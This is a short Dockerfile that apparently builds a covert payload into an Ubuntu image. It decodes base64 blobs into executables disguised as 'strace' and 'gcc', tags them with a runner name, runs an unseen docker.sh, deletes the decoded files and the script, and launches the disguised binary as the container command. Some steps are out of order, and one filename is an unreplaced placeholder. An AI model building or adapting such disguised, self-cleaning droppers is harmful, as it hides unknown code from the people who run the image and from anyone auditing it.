FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > strace.log'
RUN base64 --decode strace.64 > strace
RUN base64 --decode gcc.64 > gcc
RUN chmod +x gcc

COPY strace .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' strace
RUN bash ./docker.sh
RUN rm --force --recursive strace _REPO_NAME__.64 docker.sh gcc gcc.64

CMD strace
